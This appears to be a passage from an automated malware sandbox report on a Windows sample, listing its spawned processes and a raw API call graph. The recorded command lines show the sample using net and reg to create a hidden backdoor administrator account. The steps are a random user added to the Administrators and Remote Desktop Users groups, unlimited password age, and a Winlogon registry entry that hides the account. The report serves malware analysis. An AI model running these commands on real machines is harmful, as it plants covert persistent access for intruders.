                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:65
                                                                              Start time:02:20:49
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\fsutil.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:fsutil dirty query C:
                                                                              Imagebase:0x7ff6cc600000
                                                                              File size:214'840 bytes
                                                                              MD5 hash:DE00EDA7134D3365E6074700E3008CAD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:66
                                                                              Start time:02:20:50
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net user fsUIwEqMAc zyTFxcsIkA /add
                                                                              Imagebase:0x9e0000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:67
                                                                              Start time:02:20:50
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
                                                                              Imagebase:0x8e0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:68
                                                                              Start time:02:20:51
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net localgroup Administrators fsUIwEqMAc /add
                                                                              Imagebase:0x9e0000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:69
                                                                              Start time:02:20:52
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
                                                                              Imagebase:0x8e0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:70
                                                                              Start time:02:20:52
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                                                                              Imagebase:0x7ff7c9e40000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:71
                                                                              Start time:02:20:52
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wmic group where sid="S-1-5-32-555" get name /value
                                                                              Imagebase:0x7ff692340000
                                                                              File size:576'000 bytes
                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:72
                                                                              Start time:02:20:52
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net localgroup "Remote Desktop Users" fsUIwEqMAc /add
                                                                              Imagebase:0x9e0000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:73
                                                                              Start time:02:20:52
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
                                                                              Imagebase:0x8e0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:74
                                                                              Start time:02:20:53
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net accounts /maxpwage:unlimited
                                                                              Imagebase:0x9e0000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:75
                                                                              Start time:02:20:53
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                              Imagebase:0x8e0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:76
                                                                              Start time:02:20:54
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
                                                                              Imagebase:0xf30000
                                                                              File size:59'392 bytes
                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:13.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:24.6%
                                                                                Total number of Nodes:1775
                                                                                Total number of Limit Nodes:46
                                                                                execution_graph 13016 410550 13021 40feb0 13016->13021 13019 410568 13020 41055f ??3@YAXPAX 13020->13019 13022 40fedc 13021->13022 13025 418e80 free 13022->13025 13024 40ff00 13024->13019 13024->13020 13025->13024 13027 402554 13030 401197 13027->13030 13031 4011a3 13030->13031 13032 4011b1 13030->13032 13031->13032 13034 401080 13031->13034 13046 401041 13034->13046 13037 40109f 13039 407a45 39 API calls 13037->13039 13038 403dc8 19 API calls 13038->13037 13040 4010b7 13039->13040 13041 4010c8 ??3@YAXPAX 13040->13041 13042 411be5 ctype 3 API calls 13040->13042 13051 407734 ??3@YAXPAX 13041->13051 13042->13041 13045 4010e3 13045->13032 13052 40101c 13046->13052 13050 401057 13050->13037 13050->13038 13051->13045 13053 4076d3 3 API calls 13052->13053 13054 401024 13053->13054 13055 411b60 ??2@YAPAXI 13054->13055 13055->13050 10032 410060 10033 41007b 10032->10033 10034 410087 10033->10034 10038 418e80 free 10033->10038 10036 4100d5 10039 418e60 10036->10039 10038->10036 10040 418e64 10039->10040 10041 418e67 malloc 10039->10041 10040->10034 10041->10034 10042 410460 10043 410474 10042->10043 10044 41046b 10042->10044 10047 4101a0 10043->10047 10050 4101b0 10047->10050 10051 4103db 10047->10051 10050->10051 10053 4131ad 10050->10053 10058 40f980 10050->10058 10062 41383a 10050->10062 10054 4131d2 10053->10054 10055 4131eb 10054->10055 10069 413d81 EnterCriticalSection 10054->10069 10074 409d67 10054->10074 10055->10050 10060 40f9a4 10058->10060 10059 40fc6d memcpy 10059->10050 10060->10050 10060->10059 10061 40fc0d 10060->10061 10061->10050 10063 413849 10062->10063 10064 413873 10063->10064 10096 411265 SetFileTime 10063->10096 10097 414c7f 10063->10097 10103 4026dd 10063->10103 10109 41115b 10063->10109 10064->10050 10070 413da4 10069->10070 10071 413dbe LeaveCriticalSection 10070->10071 10073 409d67 4 API calls 10070->10073 10071->10055 10072 413df8 10072->10071 10073->10072 10075 409d6f 10074->10075 10076 409d7e 10074->10076 10080 412315 10075->10080 10077 409db0 10076->10077 10086 4122b3 10076->10086 10077->10055 10081 412325 10080->10081 10082 41231e 10080->10082 10090 4111bb SetFilePointer 10081->10090 10082->10076 10087 4122cc 10086->10087 10088 4122e0 GetLastError 10087->10088 10089 4122dc 10087->10089 10088->10089 10089->10077 10091 4111e4 GetLastError 10090->10091 10092 4111ee 10090->10092 10091->10092 10093 41218b 10092->10093 10094 412192 10093->10094 10095 412196 GetLastError 10093->10095 10094->10082 10095->10094 10096->10063 10098 414c8e 10097->10098 10100 414d32 10098->10100 10101 414c44 128 API calls 10098->10101 10112 41249f 10098->10112 10117 414b35 10098->10117 10100->10063 10101->10098 10104 4026f1 10103->10104 10108 4026e5 10103->10108 10106 40270b 10104->10106 10393 411282 10104->10393 10107 402722 SetFileAttributesW 10106->10107 10106->10108 10107->10108 10108->10063 10110 411165 CloseHandle 10109->10110 10111 411170 10109->10111 10110->10111 10111->10063 10122 4112cc 10112->10122 10115 41218b GetLastError 10116 4124d7 10115->10116 10116->10098 10118 414b53 10117->10118 10129 4029da 10118->10129 10187 4113de 10118->10187 10119 414ba8 10119->10098 10123 4112d9 10122->10123 10125 411303 10123->10125 10126 411292 10123->10126 10125->10115 10127 4112a0 10126->10127 10128 4112a3 WriteFile 10126->10128 10127->10128 10128->10123 10130 4029f5 10129->10130 10134 4029eb 10129->10134 10130->10134 10139 402a44 10130->10139 10190 411b60 ??2@YAPAXI 10130->10190 10132 4114aa VariantClear 10132->10134 10133 402a53 10135 402afb ??3@YAXPAX 10133->10135 10191 411be5 10133->10191 10134->10119 10135->10139 10138 402a73 10195 411aec 10138->10195 10139->10132 10142 411be5 ctype 3 API calls 10143 402a8e ??3@YAXPAX 10142->10143 10147 402ab8 10143->10147 10144 402abf 10206 4114aa 10144->10206 10146 402ac7 ??3@YAXPAX 10146->10139 10147->10144 10148 402b21 10147->10148 10149 402ae9 10147->10149 10151 402b60 10148->10151 10152 402b48 10148->10152 10150 4114aa VariantClear 10149->10150 10150->10135 10154 402b84 GetLocalTime SystemTimeToFileTime 10151->10154 10155 402b68 10151->10155 10153 4114aa VariantClear 10152->10153 10156 402b50 ??3@YAXPAX 10153->10156 10154->10155 10155->10149 10157 402ba4 10155->10157 10158 402bcb 10155->10158 10156->10139 10211 404772 lstrlenW 10157->10211 10198 4044ea FindFirstFileW 10158->10198 10163 402bb4 10166 4114aa VariantClear 10163->10166 10164 402cf4 GetLastError 10164->10135 10165 402bdb 10165->10163 10167 402be0 ??2@YAPAXI 10165->10167 10168 402bbc ??3@YAXPAX 10166->10168 10169 402bee 10167->10169 10168->10139 10233 411412 10169->10233 10172 402cc9 10175 4114aa VariantClear 10172->10175 10173 402c2a GetLastError 10236 411bba 10173->10236 10176 402cdf ??3@YAXPAX 10175->10176 10178 4114aa VariantClear 10176->10178 10177 402c3c 10179 404772 109 API calls 10177->10179 10182 402c48 ??3@YAXPAX 10177->10182 10178->10134 10181 402c85 10179->10181 10181->10182 10183 411412 2 API calls 10181->10183 10182->10149 10184 402cab 10183->10184 10185 402cc0 ??3@YAXPAX 10184->10185 10186 402caf GetLastError 10184->10186 10185->10172 10186->10182 10388 411359 10187->10388 10190->10133 10192 411bf6 10191->10192 10192->10192 10193 411c04 ??2@YAPAXI ??3@YAXPAX 10192->10193 10194 411c2d memcpy 10192->10194 10193->10194 10194->10138 10239 411aa9 10195->10239 10197 402a82 10197->10142 10199 404510 FindClose 10198->10199 10200 402bd2 10198->10200 10201 404520 SetLastError 10199->10201 10202 40452d 10199->10202 10200->10164 10200->10165 10201->10200 10202->10200 10203 404536 10202->10203 10205 404544 CompareFileTime 10202->10205 10243 4044bd 10203->10243 10205->10200 10205->10203 10207 4114b0 10206->10207 10208 411456 10206->10208 10207->10146 10209 41147b VariantClear 10208->10209 10210 411492 10208->10210 10209->10146 10210->10146 10212 411b84 ctype 2 API calls 10211->10212 10213 404795 10212->10213 10290 4042f3 10213->10290 10216 40479f 10217 4047e9 GetSystemTimeAsFileTime GetFileAttributesW 10216->10217 10221 404880 10216->10221 10295 40317a CreateDirectoryW 10216->10295 10218 4047fe 10217->10218 10232 404808 10217->10232 10219 4044ea 31 API calls 10218->10219 10219->10232 10220 40317a 4 API calls 10220->10232 10222 4048b0 10221->10222 10223 40480c ??3@YAXPAX 10221->10223 10225 40976c 74 API calls 10222->10225 10231 402ba9 10223->10231 10224 40481e 10301 40976c 10224->10301 10230 4048ba ??3@YAXPAX 10225->10230 10226 404872 ??3@YAXPAX 10226->10231 10227 40482d memcpy 10227->10232 10230->10231 10231->10149 10231->10163 10232->10220 10232->10223 10232->10224 10232->10226 10232->10227 10384 4113fb 10233->10384 10387 411972 ??2@YAPAXI 10236->10387 10238 411bca memcpy 10238->10177 10242 411972 ??2@YAPAXI 10239->10242 10241 411abf memcpy memcpy 10241->10197 10242->10241 10249 40352a 10243->10249 10246 4044c6 GetLastError 10248 4044d1 10246->10248 10247 4044e7 10247->10200 10248->10200 10250 403544 FindFirstFileW 10249->10250 10251 40353f 10249->10251 10250->10251 10252 403557 FindClose 10250->10252 10251->10246 10251->10247 10253 403581 10252->10253 10254 403567 SetFileAttributesW 10252->10254 10257 40340f 10253->10257 10254->10251 10255 403574 DeleteFileW 10254->10255 10255->10251 10278 411b84 10257->10278 10259 403426 10282 411ca3 10259->10282 10261 403433 FindFirstFileW 10262 4034ed SetCurrentDirectoryW SetFileAttributesW 10261->10262 10268 403455 10261->10268 10263 403502 RemoveDirectoryW 10262->10263 10264 40351a ??3@YAXPAX 10262->10264 10263->10264 10266 40350d ??3@YAXPAX 10263->10266 10267 403524 10264->10267 10265 411be5 ctype 3 API calls 10265->10268 10266->10267 10267->10251 10268->10264 10268->10265 10270 411ca3 ctype 5 API calls 10268->10270 10271 4034b4 SetFileAttributesW 10268->10271 10272 403486 lstrcmpW 10268->10272 10274 4034cc FindNextFileW 10268->10274 10277 40340f ctype 10 API calls 10268->10277 10286 4015ec 10268->10286 10270->10268 10271->10264 10275 4034bf DeleteFileW 10271->10275 10273 403498 lstrcmpW 10272->10273 10272->10274 10273->10268 10273->10274 10274->10268 10276 4034e4 FindClose 10274->10276 10275->10268 10276->10262 10277->10268 10279 411b94 10278->10279 10279->10279 10280 411972 ctype ??2@YAPAXI 10279->10280 10281 411ba2 memcpy 10280->10281 10281->10259 10283 411cb3 10282->10283 10283->10283 10284 4119b8 ctype ??2@YAPAXI memcpy ??3@YAXPAX _CxxThrowException 10283->10284 10285 411cc1 memcpy 10284->10285 10285->10261 10287 4015f7 10286->10287 10288 4015fc 10286->10288 10289 4119a2 ctype ??2@YAPAXI memcpy ??3@YAXPAX _CxxThrowException 10287->10289 10288->10268 10289->10288 10291 411bba 2 API calls 10290->10291 10292 404307 10291->10292 10293 40431d wcsncpy ??3@YAXPAX 10292->10293 10312 411917 10292->10312 10293->10216 10296 4031b8 10295->10296 10297 40318b GetLastError 10295->10297 10296->10216 10298 4031a5 GetFileAttributesW 10297->10298 10300 40319a 10297->10300 10298->10296 10298->10300 10299 40319b SetLastError 10299->10296 10300->10296 10300->10299 10315 403dc8 10301->10315 10304 4097a0 GetLastError FormatMessageW 10306 4097e3 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 10304->10306 10307 4097ce FormatMessageW 10304->10307 10305 40984f 10308 409686 44 API calls 10305->10308 10335 409686 10306->10335 10307->10305 10307->10306 10310 40985a 10308->10310 10310->10223 10313 41192a _CxxThrowException 10312->10313 10314 41193f ??2@YAPAXI ??3@YAXPAX 10312->10314 10313->10314 10314->10293 10316 403de2 10315->10316 10317 403e10 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 10316->10317 10318 403e06 wvsprintfW 10316->10318 10319 403ec0 SetLastError 10317->10319 10320 403e48 ??2@YAPAXI GetEnvironmentVariableW 10317->10320 10318->10304 10318->10305 10319->10318 10322 403ed7 10319->10322 10321 403e77 GetLastError 10320->10321 10334 403ea9 ??3@YAXPAX 10320->10334 10323 403e7d 10321->10323 10321->10334 10325 403ef8 lstrlenA ??2@YAPAXI 10322->10325 10345 403d6d 10322->10345 10328 403e87 lstrcmpiW 10323->10328 10329 403eac 10323->10329 10326 403f63 MultiByteToWideChar 10325->10326 10327 403f29 GetLocaleInfoW 10325->10327 10326->10318 10327->10326 10332 403f50 _wtol 10327->10332 10333 403e96 ??3@YAXPAX 10328->10333 10328->10334 10329->10319 10331 403eea 10331->10325 10332->10326 10333->10329 10334->10329 10336 409698 10335->10336 10337 4096fc ??3@YAXPAX LocalFree 10335->10337 10352 4076d3 10336->10352 10337->10310 10340 4096d0 10357 407a45 10340->10357 10341 4096be IsBadReadPtr 10341->10340 10346 403dc0 10345->10346 10347 403d77 GetUserDefaultUILanguage 10345->10347 10346->10331 10348 403d95 10347->10348 10349 403d99 GetSystemDefaultUILanguage 10347->10349 10348->10331 10349->10346 10350 403da9 GetSystemDefaultLCID 10349->10350 10350->10346 10351 403db9 10350->10351 10351->10346 10370 411b60 ??2@YAPAXI 10352->10370 10354 4076e4 10355 407730 IsWindow 10354->10355 10356 40770c KiUserCallbackDispatcher GetSystemMetrics 10354->10356 10355->10340 10355->10341 10356->10355 10358 407ab4 10357->10358 10359 407a54 10357->10359 10369 407734 ??3@YAXPAX 10358->10369 10359->10358 10360 411b84 ctype 2 API calls 10359->10360 10361 407a65 10360->10361 10362 411b84 ctype 2 API calls 10361->10362 10363 407a70 10362->10363 10371 40562e 10363->10371 10369->10337 10370->10354 10372 40455d 15 API calls 10371->10372 10373 405636 10372->10373 10374 40360e 18 API calls 10373->10374 10375 4055ff 10374->10375 10376 40455d 15 API calls 10375->10376 10377 405607 10376->10377 10378 4036c8 18 API calls 10377->10378 10379 405613 10378->10379 10380 403782 18 API calls 10379->10380 10381 40561f 10380->10381 10382 40383c 10 API calls 10381->10382 10383 405626 10382->10383 10385 4113de 2 API calls 10384->10385 10386 402c22 10385->10386 10386->10172 10386->10173 10387->10238 10389 41115b CloseHandle 10388->10389 10390 411364 10389->10390 10391 411368 CreateFileW 10390->10391 10392 41138b 10390->10392 10391->10392 10392->10119 10396 411265 SetFileTime 10393->10396 10395 41128f 10395->10106 10396->10395 12724 418c65 12725 413aec 6 API calls 12724->12725 12726 418c76 12725->12726 12732 418c08 12726->12732 12728 418ca6 12729 418c86 12729->12728 12737 418bdf ??2@YAPAXI 12729->12737 12741 41335d 12729->12741 12733 418c30 12732->12733 12734 418c13 12732->12734 12733->12729 12734->12733 12746 41411d 12734->12746 12738 418bf1 12737->12738 12739 4027ac 3 API calls 12738->12739 12740 418c03 12739->12740 12740->12729 12742 40721a 2 API calls 12741->12742 12743 413365 12742->12743 12744 413373 12743->12744 12755 407210 12743->12755 12744->12729 12751 407171 12746->12751 12749 407171 2 API calls 12750 414130 12749->12750 12752 40717a CloseHandle 12751->12752 12754 40718f 12751->12754 12753 407185 GetLastError 12752->12753 12752->12754 12753->12754 12754->12749 12756 4071cd 2 API calls 12755->12756 12757 407219 12756->12757 12757->12744 13262 414a64 13263 414a81 13262->13263 13264 414a71 13262->13264 13267 4142b0 13264->13267 13272 4141ad 13267->13272 13269 4142bb 13278 4141e1 13269->13278 13271 4142c3 13273 4141d6 ??3@YAXPAX 13272->13273 13274 4141b8 13272->13274 13273->13269 13276 4141d5 13274->13276 13284 413fa4 13274->13284 13276->13273 13279 41420a ??3@YAXPAX 13278->13279 13280 4141ec 13278->13280 13279->13271 13281 41411d 2 API calls 13280->13281 13282 414209 13280->13282 13283 4141fe ??3@YAXPAX 13281->13283 13282->13279 13283->13280 13293 41391e 13284->13293 13287 4014a8 2 API calls 13288 413fba 13287->13288 13289 4014a8 2 API calls 13288->13289 13290 413fc2 ??3@YAXPAX ??3@YAXPAX 13289->13290 13299 413f2b 13290->13299 13294 413932 13293->13294 13295 41392d 13293->13295 13298 41393e 13294->13298 13307 407199 WaitForSingleObject 13294->13307 13306 4071f2 SetEvent 13295->13306 13298->13287 13300 41391e 2 API calls 13299->13300 13301 413f39 13300->13301 13302 407171 2 API calls 13301->13302 13303 413f41 13302->13303 13304 407171 2 API calls 13303->13304 13305 413f49 13304->13305 13307->13298 13765 419b6c 13770 405488 13765->13770 13768 4191ee 2 API calls 13769 419b80 13768->13769 13775 411b60 ??2@YAPAXI 13770->13775 13772 405499 13776 411b60 ??2@YAPAXI 13772->13776 13774 4054a1 13774->13768 13775->13772 13776->13774 12432 407171 12433 40717a CloseHandle 12432->12433 12435 40718f 12432->12435 12434 407185 GetLastError 12433->12434 12433->12435 12434->12435 10420 414e08 _EH_prolog 10423 414e30 10420->10423 10422 414f09 ??2@YAPAXI 10424 414f15 10422->10424 10444 414e5a 10423->10444 10446 402446 10423->10446 10425 414f5b ??2@YAPAXI 10424->10425 10441 414f69 10425->10441 10426 414fd9 10456 414da0 10426->10456 10427 415021 10429 414da0 ??3@YAXPAX 10427->10429 10429->10444 10431 41515c 10432 414da0 ??3@YAXPAX 10431->10432 10432->10444 10435 414d71 128 API calls 10435->10441 10436 4152e9 ??3@YAXPAX 10436->10431 10438 415272 ??3@YAXPAX 10442 415282 10438->10442 10440 415308 ??3@YAXPAX 10440->10441 10441->10426 10441->10427 10441->10431 10441->10435 10441->10436 10441->10438 10441->10440 10441->10444 10459 414de3 10441->10459 10462 411b60 ??2@YAPAXI 10441->10462 10463 4142cc 10441->10463 10520 414d71 10441->10520 10443 414da0 ??3@YAXPAX 10442->10443 10443->10444 10447 402454 GetDiskFreeSpaceExW 10446->10447 10448 4024aa SendMessageW 10446->10448 10447->10448 10449 40246c 10447->10449 10454 402492 10448->10454 10449->10448 10450 403dc8 19 API calls 10449->10450 10451 402486 10450->10451 10524 4096ff 10451->10524 10454->10422 10454->10444 10455 4024a3 10455->10448 10457 414db0 ??3@YAXPAX 10456->10457 10458 414daa 10456->10458 10458->10457 10534 414c44 10459->10534 10462->10441 10538 416cb7 10463->10538 10466 414329 10543 414189 ??3@YAXPAX ??3@YAXPAX 10466->10543 10467 41433f 10547 414008 10467->10547 10469 414331 10469->10441 10473 41436f ??3@YAXPAX 10564 413abd ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10473->10564 10475 414380 10477 414189 6 API calls 10475->10477 10476 414404 ??2@YAPAXI 10479 414413 10476->10479 10477->10469 10478 414366 10478->10476 10504 41436a 10478->10504 10518 4144e7 10478->10518 10483 4144cc 10479->10483 10479->10504 10565 4120c1 10479->10565 10481 4147b5 10592 413e1f 10481->10592 10569 413aec 10483->10569 10484 414980 10489 413a3e ??2@YAPAXI 10484->10489 10487 4148cf ??2@YAPAXI 10513 414871 10487->10513 10490 41498e 10489->10490 10492 414a43 ??3@YAXPAX 10490->10492 10493 4149b8 10490->10493 10495 414a51 10492->10495 10508 4149dd 10493->10508 10603 4184bf 10493->10603 10497 4014a8 2 API calls 10495->10497 10496 4147bc 10506 414808 ??3@YAXPAX ??3@YAXPAX 10496->10506 10496->10513 10595 4014a8 10496->10595 10501 414a5f 10497->10501 10499 4147dc 10509 4147e7 SysFreeString 10499->10509 10500 4014a8 2 API calls 10500->10508 10501->10501 10503 41490a ??2@YAPAXI 10503->10513 10504->10473 10505 4149d1 ??2@YAPAXI 10505->10508 10506->10496 10508->10500 10511 414a3a ??3@YAXPAX 10508->10511 10509->10504 10511->10508 10512 414612 ??2@YAPAXI 10512->10518 10513->10484 10513->10487 10513->10503 10513->10508 10599 418703 ??2@YAPAXI 10513->10599 10515 411be5 ctype 3 API calls 10515->10518 10516 414645 ??3@YAXPAX SysFreeString 10516->10496 10516->10518 10517 41475c ??3@YAXPAX ??3@YAXPAX 10517->10518 10519 414783 ??2@YAPAXI 10517->10519 10518->10499 10518->10504 10518->10506 10518->10509 10518->10512 10518->10515 10518->10516 10518->10517 10518->10519 10586 413a13 10518->10586 10589 413a3e 10518->10589 10519->10481 10519->10496 10523 414d76 10520->10523 10521 414d9a ??3@YAXPAX 10521->10431 10521->10441 10522 414b35 128 API calls 10522->10523 10523->10521 10523->10522 10525 4076d3 3 API calls 10524->10525 10526 409710 IsWindow 10525->10526 10527 409739 10526->10527 10528 409727 IsBadReadPtr 10526->10528 10529 407a45 39 API calls 10527->10529 10528->10527 10530 40975d 10529->10530 10533 407734 ??3@YAXPAX 10530->10533 10532 40248d 10532->10454 10532->10455 10533->10532 10535 414c49 10534->10535 10536 414c7b 10535->10536 10537 414b35 128 API calls 10535->10537 10536->10441 10537->10535 10607 416ae6 10538->10607 10541 414319 10541->10466 10541->10467 10542 416cef _CxxThrowException 10542->10541 10544 4141a5 10543->10544 10545 4141ac 10543->10545 10546 413ece 4 API calls 10544->10546 10545->10469 10546->10545 10548 414017 10547->10548 10669 41214a 10548->10669 10551 41824f 2 API calls 10552 414066 10551->10552 10553 41214a 2 API calls 10552->10553 10554 414075 10553->10554 10554->10554 10555 41824f 2 API calls 10554->10555 10556 4140ba 10555->10556 10557 4183c8 10556->10557 10558 4183e4 10557->10558 10560 4183e8 10557->10560 10558->10478 10560->10558 10562 4027ac ??2@YAPAXI memcpy ??3@YAXPAX 10560->10562 10563 41842c 10560->10563 10561 41844e ??3@YAXPAX 10561->10558 10562->10560 10563->10558 10672 418374 10563->10672 10564->10475 10566 4120e2 10565->10566 10567 4120ec ??2@YAPAXI 10566->10567 10568 4120ff 10566->10568 10567->10568 10568->10479 10680 413949 10569->10680 10572 4139ae 3 API calls 10573 413b06 10572->10573 10574 413949 3 API calls 10573->10574 10575 413b12 10574->10575 10576 413949 3 API calls 10575->10576 10577 413b24 10576->10577 10578 413949 3 API calls 10577->10578 10579 413b30 10578->10579 10580 4139ae 10579->10580 10581 4139ba 10580->10581 10582 413a0b 10580->10582 10583 4139c3 ??3@YAXPAX ??2@YAPAXI 10581->10583 10584 4139f2 10581->10584 10582->10518 10583->10584 10584->10582 10585 4139f9 memcpy 10584->10585 10585->10582 10587 413a21 ??2@YAPAXI 10586->10587 10588 413a38 10586->10588 10587->10588 10588->10518 10590 413a63 10589->10590 10591 413a4c ??2@YAPAXI 10589->10591 10590->10518 10591->10590 10686 407224 InitializeCriticalSection 10592->10686 10594 413e38 10594->10496 10597 4014b1 10595->10597 10596 4014c6 ??3@YAXPAX 10596->10496 10597->10596 10687 413a69 10597->10687 10600 418715 10599->10600 10691 4027ac 10600->10691 10604 4184db 10603->10604 10605 4149cd 10603->10605 10604->10605 10699 41845f 10604->10699 10605->10505 10605->10508 10621 4160bb 10607->10621 10613 4160bb _CxxThrowException 10616 416af9 10613->10616 10614 416c8a 10615 416cb0 10614->10615 10617 4160bb _CxxThrowException 10614->10617 10615->10541 10615->10542 10616->10613 10616->10614 10616->10615 10624 415eda _CxxThrowException 10616->10624 10625 416a51 10616->10625 10631 40bcc0 10616->10631 10637 415f69 10616->10637 10642 40b7b0 10616->10642 10645 416147 10616->10645 10650 416187 10616->10650 10617->10614 10655 416087 10621->10655 10626 416a5e 10625->10626 10628 416ab5 10625->10628 10627 416a65 ??2@YAPAXI 10626->10627 10629 416a8c 10626->10629 10627->10629 10628->10616 10629->10628 10660 413ece 10629->10660 10632 40bcfb 10631->10632 10633 40bccd 10631->10633 10632->10616 10634 40bce2 10633->10634 10635 40bcd3 ??3@YAXPAX 10633->10635 10634->10632 10636 40bced ??2@YAPAXI 10634->10636 10635->10634 10636->10632 10638 415f75 10637->10638 10639 415f9b 10637->10639 10640 415f86 memcpy 10638->10640 10668 415eba _CxxThrowException 10638->10668 10639->10616 10640->10639 10643 40b7c8 10642->10643 10644 40b7b9 ??3@YAXPAX 10642->10644 10643->10616 10644->10643 10646 416182 10645->10646 10647 416154 10645->10647 10646->10616 10648 416174 ??3@YAXPAX 10647->10648 10649 41615b ??2@YAPAXI 10647->10649 10648->10646 10649->10648 10651 4161c2 10650->10651 10652 416194 10650->10652 10651->10616 10653 4161b4 ??3@YAXPAX 10652->10653 10654 41619b ??2@YAPAXI 10652->10654 10653->10651 10654->10653 10656 4160a5 10655->10656 10657 4160b1 10656->10657 10659 415eba _CxxThrowException 10656->10659 10657->10616 10661 413edb 10660->10661 10662 413f0f ??3@YAXPAX 10660->10662 10665 413efd 10661->10665 10666 413eef ??3@YAXPAX 10661->10666 10663 413f09 10662->10663 10664 413f1d ??3@YAXPAX 10662->10664 10663->10628 10664->10663 10665->10663 10667 413f02 ??3@YAXPAX 10665->10667 10666->10665 10666->10666 10667->10663 10670 412186 10669->10670 10671 41215b ??3@YAXPAX ??2@YAPAXI 10669->10671 10670->10551 10671->10670 10677 4162d8 10672->10677 10675 41838d memset 10676 418399 10675->10676 10676->10561 10678 416304 10677->10678 10679 4162e9 ??3@YAXPAX ??2@YAPAXI 10677->10679 10678->10675 10678->10676 10679->10678 10681 413955 10680->10681 10682 4139a6 10680->10682 10683 41398d 10681->10683 10684 41395e ??3@YAXPAX ??2@YAPAXI 10681->10684 10682->10572 10683->10682 10685 413994 memcpy 10683->10685 10684->10683 10685->10682 10686->10594 10688 413a72 10687->10688 10689 413a86 10688->10689 10690 413a7f ??3@YAXPAX 10688->10690 10689->10597 10690->10689 10694 40261b 